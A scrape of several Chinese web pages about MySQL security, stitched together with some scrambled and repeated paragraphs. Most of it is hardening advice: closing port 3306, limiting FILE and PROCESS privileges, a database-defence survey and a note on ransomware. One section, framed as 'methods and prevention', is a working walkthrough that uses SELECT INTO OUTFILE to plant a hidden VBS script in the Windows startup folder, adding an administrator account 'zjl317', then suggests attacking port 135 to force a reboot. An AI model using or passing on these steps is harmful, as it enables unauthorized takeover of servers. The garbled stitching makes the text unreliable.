如何关闭Mysql打开的3306端口防止系统被入侵_百度知道
如何关闭Mysql打开的3306端口防止系统被入侵
我有更好的答案求助知道网友
进入控制面板，切换到图标显示（方便寻找）进入“管理工具”中，双击打开“服务”，找到mysql禁用就好了
Mysql会自动开启3306端口用于远程连接mysql服务. 3306端口就是MySQL的默认端口, 但是黑客可以通过它来攻击你的主机系统. 服务器默认MySQL端口是3306, 最近经常被扫描, 甚至扫描到网站很慢或者打不开. 如果不需要远程数据库连接就可以让Mysql关闭3306端口, 既提高了访问速度, 又提高了安全性. 避免远程连接mysql数据库. 本地程序可以通过mysql.sock来连接, 不影响使用.SSH到主机上输入下面的命令:vi /etc/my.cnf在[mysqld]下添加:skip-networking最后重启Mysqlservice mysqld restart检查Mysql是否正常运行service mysqld status
最近经常被扫描, 甚至扫描到网站很慢或者打不开. 如果不需要远程数据库连接就可以让Mysql关闭3306端口, 又提高了安全性. 避免远程连接mysql数据库. 本地程序可以通过mysql, 既提高了访问速度;etc&#47.sock来连接, 不影响使用.SSH到主机上输入下面的命令:vi &#47Mysql会自动开启3306端口用于远程连接mysql服务. 3306端口就是MySQL的默认端口, 但是黑客可以通过它来攻击你的主机系统. 服务器默认MySQL端口是3306
本回答被网友采纳
1条折叠回答
为您推荐：
其他类似问题
换一换
回答问题，赢新手礼包
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。通过MySQL系统得到cmdshell的方法与防范
互联网 & 09-30 22:57:59 & 作者：佚名 &
这篇文章主要介绍了对于安全设置不是很好的服务器，通过mysql来获取cmdshell的方法，后面我们会给出防范措施。
1、连接到对方MYSQL 服务器 　　 mysql -u root -h 192.168.0.1 　　 mysql.exe 这个程序在你安装了MYSQL的的BIN目录中 2、让我们来看看服务器中有些什么数据库 　　 mysql& 　　 MYSQL默认安装时会有MYSQL、TEST这两个数据库，如果你看到有其它的数据库那么就是用户自建的数据库。 　　 3、让我们进入数据库 　　 mysql& 　　 我们将会进入test数据库中 　　 4、查看我们进入数据库中有些什么数据表 　　 mysql& 　　 默认的情况下，test中没有任何表的存在。 　　 以下为关键的部分 　　 5、在TEST数据库下创建一个新的表； 　　 mysql&create table a (cmd text); 　　 好了，我们创建了一个新的表，表名为a，表中只存放一个字段，字段名为cmd，为text文本。 　　 6、在表中插入内容 　　 mysql&insert into a values (&set wshshell=createobject (&&wscript.shell&& ) & ); 　　 mysql&insert into a values (&a=wshshell.run (&&cmd.exe /c net user zjl317 zjl317 /add&&,0) & ); 　　 mysql&insert into a values (&b=wshshell.run (&&cmd.exe /c net localgroup Administrators zjl317 /add&&,0) & ); 　　 注意双引号和括号以及后面的&0&一定要输入！我们将用这三条命令来建立一个VBS的脚本程序！ 　　 7、好了，现在我们来看看表a中有些什么 　　 mysql&select * 　　 我们将会看到表中有三行数据，就是我们刚刚输入的内容，确认你输入的内容无误后，我们来到下一步 　　 8、输出表为一个VBS的脚本文件 　　 mysql&select * from a into outfile &c:\docume~1\alluse~1\「开始」菜单\程序\启动\a.vbs&; 　　 我们把我们表中的内容输入到启动组中，是一个VBS的脚本文件！注意&&符号。 　　 9、看到这大家肯定知道了，就是利用MYSQL输出一个可执行的文件而已。为什么不用BAT呢，因为启动运行时会有明显的DOS窗口出来，而用VBS脚本则可以完全隐藏窗口且不会有错误提示！本来，应该还有一句完成脚本后自动删除此脚本的，但是中文目录实在无法处理，只有作罢！好了，找个工具攻击135让服务器重启吧，几分钟以后你就是管理员了。 防范：一般来说可以通过限制mysql的运行账户权限，限制mysql运行账户的一些写入文件权限，例如(vbs,vba,bat,cmd等格式的后缀名文件。) 大家经常使用mcafee来实现，强烈推荐，更多软件可以参考
大家感兴趣的内容
12345678910
最近更新的内容数据库系统防黑客入侵技术综述-mysql教程-PHP中文网QQ群微信公众号还没有收藏 数据库系统防黑客入侵技术综述[导读] 　　1
前言　　随着计算机技术的飞速发展，数据库的应用十分广泛，深入到各个领域，但随之而来产生了数据的安全问题。各种应用系统的数据库中大量数据的安全问题、敏感数据的防窃取和防篡改问题，越来越引起人　　1. 前言　　随着计算机技术的飞速发展，数据库的应用十分广泛，深入到各个领域，但随之而来产生了数据的安全问题。各种应用系统的数据库中大量数据的安全问题、敏感数据的防窃取和防篡改问题，越来越引起人们的高度重视。数据库系统作为信息的聚集体，是计算机信息系统的核心部件，其安全性至关重要，关系到企业兴衰、国家安全。因此，如何有效地保证数据库系统的安全，实现数据的保密性、完整性和有效性，已经成为业界人士探索研究的重要课题之一，本文就安全防入侵技术做简要的讨论。　　数据库系统的安全除依赖自身内部的安全机制外，还与外部网络环境、应用环境、从业人员素质等因素息息相关，因此，从广义上讲，数据库系统的安全框架可以划分为三个层次：　　⑴ 网络系统层次；　　⑵ 宿主操作系统层次；　　⑶ 数据库管理系统层次。　　这三个层次构筑成数据库系统的安全体系，与数据安全的关系是逐步紧密的，防范的重要性也逐层加强，从外到内、由表及里保证数据的安全。下面就安全框架的三个层次展开论述。　　2. 网络系统层次安全技术　　从广义上讲，数据库的安全首先倚赖于网络系统。随着Internet的发展普及，越来越多的公司将其核心业务向互联网转移，各种基于网络的数据库应用系统如雨后春笋般涌现出来，面向网络用户提供各种信息服务。可以说网络系统是数据库应用的外部环境和基础，数据库系统要发挥其强大作用离不开网络系统的支持，数据库系统的用户（如异地用户、分布式用户）也要通过网络才能访问数据库的数据。网络系统的安全是数据库安全的第一道屏障，外部入侵首先就是从入侵网络系统开始的。网络入侵试图破坏信息系统的完整性、机密性或可信任的任何网络活动的集合，具有以下特点[1]：　　a）没有地域和时间的限制，跨越国界的攻击就如同在现场一样方便；　　b）通过网络的攻击往往混杂在大量正常的网络活动之中，隐蔽性强；　　c）入侵手段更加隐蔽和复杂。　　计算机网络系统开放式环境面临的威胁主要有以下几种类型[2]：a)欺骗（Masquerade）；b)重发(Replay)；c)报文修改(Modification of message)；d)拒绝服务(Deny of service)；e)陷阱门(Trapdoor)；f)特洛伊木马(Trojan horse)；g)攻击如透纳攻击（Tunneling Attack）、应用软件攻击等。这些安全威胁是无时、无处不在的，因此必须采取有效的措施来保障系统的安全。　　从技术角度讲，网络系统层次的安全防范技术有很多种，大致可以分为防火墙、入侵检测、协作式入侵检测技术等。　　⑴防火墙。防火墙是应用最广的一种防范技术。作为系统的第一道防线，其主要作用是监控可信任网络和不可信任网络之间的访问通道，可在内部与外部网络之间形成一道防护屏障，拦截来自外部的非法访问并阻止内部信息的外泄，但它无法阻拦来自网络内部的非法操作。它根据事先设定的规则来确定是否拦截信息流的进出，但无法动态识别或自适应地调整规则，因而其智能化程度很有限。防火墙技术主要有三种：数据包过滤器(packet filter)、代理(proxy)和状态分析(stateful inspection)。现代防火墙产品通常混合使用这几种技术。　　⑵入侵检测。入侵检测(IDS-- Instrusion Detection System)是近年来发展起来的一种防范技术，综合采用了统计技术、规则方法、网络通信技术、人工智能、密码学、推理等技术和方法，其作用是监控网络和计算机系统是否出现被入侵或滥用的征兆。1987年，Derothy Denning首次提出了一种检测入侵的思想，经过不断发展和完善，作为监控和识别攻击的标准解决方案，IDS系统已经成为安全防御系统的重要组成部分。　　入侵检测采用的分析技术可分为三大类：签名、统计和数据完整性分析法。　　①签名分析法。主要用来监测对系统的已知弱点进行攻击的行为。人们从攻击模式中归纳出它的签名，编写到IDS系统的代码里。签名分析实际上是一种模板匹配操作。　　②统计分析法。以统计学为理论基础，以系统正常使用情况下观察到的动作模式为依据来判别某个动作是否偏离了正常轨道。　　③数据完整性分析法。以密码学为理论基础，可以查证文件或者对象是否被别人修改过。　　IDS的种类包括基于网络和基于主机的入侵监测系统、基于特征的和基于非正常的入侵监测系统、实时和非实时的入侵监测系统等[1]。　　⑶协作式入侵监测技术　　独立的入侵监测系统不能够对广泛发生的各种入侵活动都做出有效的监测和反应，为了弥补独立运作的不足，人们提出了协作式入侵监测系统的想法。在协作式入侵监测系统中，IDS基于一种统一的规范，入侵监测组件之间自动地交换信息，并且通过信息的交换得到了对入侵的有效监测，可以应用于不同的网络环境[3]。　　3. 宿主操作系统层次安全技术　　操作系统是大型数据库系统的运行平台，为数据库系统提供一定程度的安全保护。目前操作系统平台大多数集中在Windows NT 和Unix，安全级别通常为C1、C2级。主要安全技术有操作系统安全策略、安全管理策略、数据安全等方面。　　操作系统安全策略用于配置本地计算机的安全设置，包括密码策略、账户锁定策略、审核策略、IP安全策略、用户权利指派、加密数据的恢复代理以及其它安全选项[7]。具体可以体现在用户账户、口令、访问权限、审计等方面。　　用户账户：用户访问系统的&身份证&，只有合法用户才有账户。　　口令：用户的口令为用户访问系统提供一道验证。　　访问权限：规定用户的权限。　　审计：对用户的行为进行跟踪和记录，便于系统管理员分析系统的访问情况以及事后的追查使用。　　安全管理策略是指网络管理员对系统实施安全管理所采取的方法及策略。针对不同的操作系统、网络环境需要采取的安全管理策略一般也不尽相同，其核心是保证服务器的安全和分配好各类用户的权限。　　数据安全主要体现在以下几个方面：数据加密技术、数据备份、数据存储的安全性、数据传输的安全性等。可以采用的技术很多，主要有Kerberos认证、IPSec、SSL、TLS、VPN（PPTP、L2TP）等技术。　　4. 数据库管理系统层次安全技术　　数据库系统的安全性很大程度上依赖于数据库管理系统。如果数据库管理系统安全机制非常强大，则数据库系统的安全性能就较好。目前市场上流行的是关系式数据库管理系统，其安全性功能很弱，这就导致数据库系统的安全性存在一定的威胁。　　由于数据库系统在操作系统下都是以文件形式进行管理的，因此入侵者可以直接利用操作系统的漏洞窃取数据库文件，或者直接利用OS工具来非法伪造、篡改数据库文件内容。这种隐患一般数据库用户难以察觉，分析和堵塞这种漏洞被认为是B2级的安全技术措施[4]。　　数据库管理系统层次安全技术主要是用来解决这一问题，即当前面两个层次已经被突破的情况下仍能保障数据库数据的安全，这就要求数据库管理系统必须有一套强有力的安全机制。解决这一问题的有效方法之一是数据库管理系统对数据库文件进行加密处理，使得即使数据不幸泄露或者丢失，也难以被人破译和阅读。　　我们可以考虑在三个不同层次实现对数据库数据的加密，这三个层次分别是OS层、DBMS内核层和DBMS外层。　　⑴在OS层加密。在OS层无法辨认数据库文件中的数据关系，从而无法产生合理的密钥，对密钥合理的管理和使用也很难。所以，对大型数据库来说，在OS层对数据库文件进行加密很难实现。　　⑵在DBMS内核层实现加密。这种加密是指数据在物理存取之前完成加/脱密工作。这种加密方式的优点是加密功能强，并且加密功能几乎不会影响DBMS的功能，可以实现加密功能与数据库管理系统之间的无缝耦合。其缺点是加密运算在服务器端进行，加重了服务器的负载，而且DBMS和加密器之间的接口需要DBMS开发商的支持。　　定义加密要求工具　　DBMS　　数据库应用系统　　加密器　　（软件或硬件）　　⑶在DBMS外层实现加密。比较实际的做法是将数据库加密系统做成DBMS的一个外层工具，根据加密要求自动完成对数据库数据的加/脱密处理：　　定义加密要求工具加密器　　（软件或硬件）　　DBMS　　数据库应用系统　　采用这种加密方式进行加密，加/脱密运算可在客户端进行，它的优点是不会加重数据库服务器的负载并且可以实现网上传输的加密，缺点是加密功能会受到一些限制，与数据库管理系统之间的耦合性稍差。下面我们进一步解释在DBMS外层实现加密功能的原理：　　数据库加密系统分成两个功能独立的主要部件：一个是加密字典管理程序，另一个是数据库加/脱密引擎。数据库加密系统将用户对数据库信息具体的加密要求以及基础信息保存在加密字典中，通过调用数据加/脱密引擎实现对数据库表的加密、脱密及数据转换等功能。数据库信息的加/脱密处理是在后台完成的，对数据库服务器是透明的。　　加密字典管理程序　　加密系统　　应用程序　　数据库加脱密引擎　　数据库服务器　　加密字典　　用户数据　　按以上方式实现的数据库加密系统具有很多优点：首先，系统对数据库的最终用户是完全透明的，管理员可以根据需要进行明文和密文的转换工作；其次，加密系统完全独立于数据库应用系统，无须改动数据库应用系统就能实现数据加密功能；第三，加解密处理在客户端进行，不会影响数据库服务器的效率。　　数据库加/脱密引擎是数据库加密系统的核心部件，它位于应用程序与数据库服务器之间，负责在后台完成数据库信息的加/脱密处理，对应用开发人员和操作人员来说是透明的。数据加/脱密引擎没有操作界面，在需要时由操作系统自动加载并驻留在内存中，通过内部接口与加密字典管理程序和用户应用程序通讯。数据库加/脱密引擎由三大模块组成：加/脱密处理模块、用户接口模块和数据库接口模块，如图4所示。其中，&数据库接口模块&的主要工作是接受用户的操作请求，并传递给&加/脱密处理模块&，此外还要代替&加/脱密处理模块&去访问数据库服务器，并完成外部接口参数与加/脱密引擎内部数据结构之间的转换。&加/脱密处理模块&完成数据库加/脱密引擎的初始化、内部专用命令的处理、加密字典信息的检索、加密字典缓冲区的管理、SQL命令的加密变换、查询结果的脱密处理以及加脱密算法实现等功能，另外还包括一些公用的辅助函数。　　数据加/脱密处理的主要流程如下：　　1） 对SQL命令进行语法分析，如果语法正确，转下一步；如不正确，则转6），直接将SQL命令交数据库服务器处理。　　2） 是否为数据库加/脱密引擎的内部控制命令？如果是，则处理内部控制命令，然后转7）；如果不是则转下一步。　　3） 检查数据库加/脱密引擎是否处于关闭状态或SQL命令是否只需要编译？如果是则转6），否则转下一步。　　4） 检索加密字典，根据加密定义对SQL命令进行加脱密语义分析。　　5） SQL命令是否需要加密处理？如果是，则将SQL命令进行加密变换，替换原SQL命令，然后转下一步；否则直接转下一步。　　6） 将SQL命令转送数据库服务器处理。　　7） SQL命令执行完毕，清除SQL命令缓冲区。　　以上以一个例子说明了在DBMS外层实现加密功能的原理。　　5. 结束语　　本文对数据库系统安全防入侵技术进行综述，提出了数据库系统的安全体系三个层次框架，并对三个层次的技术手段展开描述。文中还以在DBMS外层实现加密功能的原理为例，详细说明了如何应用数据库管理系统层次的安全技术。　　数据库系统安全框架的三个层次是相辅相承的，各层次的防范重点和所采取的技术手段也不尽相同，一个好的安全系统必须综合考虑核运用这些技术，以保证数据的安全。 以上就是 数据库系统防黑客入侵技术综述的内容，更多相关内容请关注PHP中文网（www.php.cn）！共3篇58点赞收藏分享：.php.cn&猜你喜欢PHP中文网：独家原创，永久免费的在线，php技术学习阵地！
All Rights Reserved | 皖B2-QQ群:关注微信公众号我的位置：
防止网络黑客入侵mysqld数据库的三个致命点
来源：[] 发布日期：
编辑：学校
导读：我们应该怎么样防止我们的数据库被黑客入侵呢？以下讲解黑客入侵我们网站的三个点： 其一： 不要把file权限给所有的用...
　　我们应该怎么样防止我们的数据库被黑客入侵呢？以下讲解黑客入侵我们网站的三个点：
& & 其一：
　　不要把file权限给所有的用户。有这权限的任何用户能在拥有守护进程权限的文件系统那里写一个文件！为了使这更安全一些，用SELECT ... INTO OUTFILE生成的所有文件对每个人是可读的，并且你不能覆盖已经存在的文件。file权限也可以被用来读取任何作为运行服务器的Unix用户可存取的文件。这可能被滥用，例如，通过使用LOAD DATA装载&/etc/passwd&进一个数据库表，然后它能用SELECT被读入。
　　如果你不信任你的DNS，你应该在授权表中使用IP数字而不是主机名。原则上讲，--secure选项对mysqld应该使主机名更安全。在任何情况下，你应该非常小心地使用包含通配符的主机名
& & 其二：
　　不要作为Unix的root用户运行MySQL守护进程。mysqld能以任何用户运行，你也可以创造一个新的Unix用户mysql使一切更安全。如果你作为其它Unix用户运行mysqld，你不需要改变在user表中的root用户名，因为MySQL用户名与Unix 用户名没关系。你可以作为其它Unix用户编辑mysql.server启动脚本mysqld。通常这用su命令完成。对于更多的细节，见18.8 怎样作为一个一般用户运行MySQL。
　　如果你把一个Unix root用户口令放在mysql.server脚本中，确保这个脚本只能对root是可读的。
　　检查那个运行mysqld的Unix用户是唯一的在数据库目录下有读/写权限的用户。
& & 其三：
　　不要把process权限给所有用户。mysqladmin processlist的输出显示出当前执行的查询正文，如果另外的用户发出一个UPDATE user SET password=PASSWORD( ot_secure)查询，被允许执行那个命令的任何用户可能看得到。mysqld为有process权限的用户保留一个额外的连接, 以便一个MySQL root用户能登录并检查，即使所有的正常连接在使用。
(广力提供：、、网站开发等培训)
热点搜词：mysqld,数据库
2017高考生“企业委培班”特招(限招25名),十万年薪等你拿
*联系手机：
扫一扫关注我们
广州广力北大青鸟学校官方微信
公众微信号：gdglccom
关注：北大青鸟广州广力学员，生活动态、学习动态、学员活动、学生会活动、就业资讯、就业薪资、明星学员、就业讲座、学员作品......
MySQL8.0.0的发展里程碑版本（DMR），MySQL的工程师....
JQuery是继prototype之后又一个优秀的Javascript库。它....
mysql培训哪家好？....
我们应该怎么样防止我们的数据库被黑客入侵呢....
PHP查询MySQL数据的内存，广州广力培训课程有AC....
1.使用MyISAM而不是InnoDB MySQL有很多的数据库引擎，....
高中生特招班
技能+学历班
企业定向委培班
java软件开发班
ACCP软件开发班
广州北大青鸟全国咨询热线 / 020
Copyright (C)
www.gdglc.com..办学许可证号：5
广州广力科技培训中心（广州北大青鸟Aptech广力校区） 版权所有.TEL:020- 邮编：510033
广东省广州市海珠区晓港西马路151号（海珠电大内）
地铁2号线与8号线:昌岗站（B出口），晓港（C出口）数据库勒索事件频发，应该如何确保不被入侵勒索?
数据库勒索事件频发，应该如何确保不被入侵勒索?
从2016年12月份到2017年，互联网用户陆续遭受到不同类型数据的勒索事件，笔者统计了一下，大概至少有5中类型的针对数据的勒索事件：
ElasticSearch勒索事件
MongoDB勒索事件
MySQL勒索事件
Redis勒索事件
PostgreSQL勒索事件
甚至还有针对Oracle的勒索事件……
看起来只要是“裸奔”在互联网上的数据库，都未能幸免，成百上千个开放在公网的 MySQL 数据库被劫持，攻击者删除了数据库中的存储数据，并留下勒索信息，要求支付比特币以赎回数据。
从2016年12月份到2017年，互联网用户陆续遭受到不同类型数据库的勒索事件，笔者统计了一下，大概至少有5中类型的针对数据的勒索事件：
ElasticSearch勒索事件
MongoDB勒索事件
MySQL勒索事件
Redis勒索事件
PostgreSQL勒索事件
甚至还有针对Oracle的勒索事件……
看起来只要是“裸奔”在互联网上的数据库，都未能幸免，成百上千个开放在公网的 MySQL 数据库被劫持，攻击者删除了数据库中的存储数据，并留下勒索信息，要求支付比特币以赎回数据。这对于企业用户，如果发生这样的事情，可能面临一场“灾难”。
以下攻击者针对MongoDB勒索留下的勒索信息:
一.事件原因
从MongoDB 和 Elasticsearch 以及现在的 MySQL 数据库勒索的案例里面发现，可以发现都是基线安全问题导致被黑客劫持数据而勒索，
主要问题的根因是由于这些被勒索的自建数据库服务都开放在公网上，并且存在空密码或者弱口令等使得攻击者可以轻易暴力破解成功，直接连上数据库从而下载并清空数据，特别是不正确的安全组配置或没有配置任何网络访问控制策略导致问题被放大。
基线安全问题已经成了Web漏洞之外入侵服务器的主要途径，特别是无网络访问控制、默认账号和空口令、默认账号弱口令、后台暴露、后台无口令未授权访问等情况。错误的配置可以导致相关服务暴露在公网上，成为黑客攻击的目标，加上采用空密码等弱口令，黑客以极低的攻击成本轻松获取和入侵这些服务。
二.安全隐患自查
找到了原因，我就可以”对症下药”了，您可以通过自动化检测攻击或人工两种方式进行排查:
1.自动化检测方式：
阿里云提供默认的检测策略，无需安装，您可以登录到控制台，查看安骑士检测的结果，并根据结果进行整改封堵漏洞。
2.人工+工具排查:
您也可以使用类似NMap这样的端口扫描工具直接针对被检查的服务器IP(在服务器外网执行)执行扫描，以确认业务服务器开放在外网的端口和服务。
注:需要在授权情况下对自身业务进行扫描，不要对其他不相关的业务进行非法扫描，避免法律风险。
三.安全建议及修复方案
1.配置严格网络访问控制策略
当您安装完服务或在运维过程中发现对外开放了服务后，您可以使用Windows 自带防火墙功能、Linux系统的iptables防火墙功能配置必要的访问控制策略，当然，最简单的方式可以使用控制内外网出入的流量，防止暴露更多不安全的服务。
2.对操作系统和服务进行安全加固
必要的安全加固是确保业务在云上安全可靠运行的条件，您可以使用安骑士的自动化检测和人工加固指南对业务服务器进行安全加固。请点击参考更多的。
用云栖社区APP，舒服~
【云栖快讯】新年大招！云栖社区为在读大学生/研究生准备了一份学（huan）习（zhuang）攻略，发布博文即有机会赢得iPad mini 4等大奖，学习换装两不误！欢迎报名参与~&&
牧夫好学生
由轻量级Agent和云端组成，集云盾威胁情报于一体，通过Agent和云端大数据的联动，为您提...
通过机器学习和数据建模发现潜在的入侵和攻击威胁，帮助客户建设自己的安全监控和防御体系，从而解...
2017阿里千余份技术干货大盘点}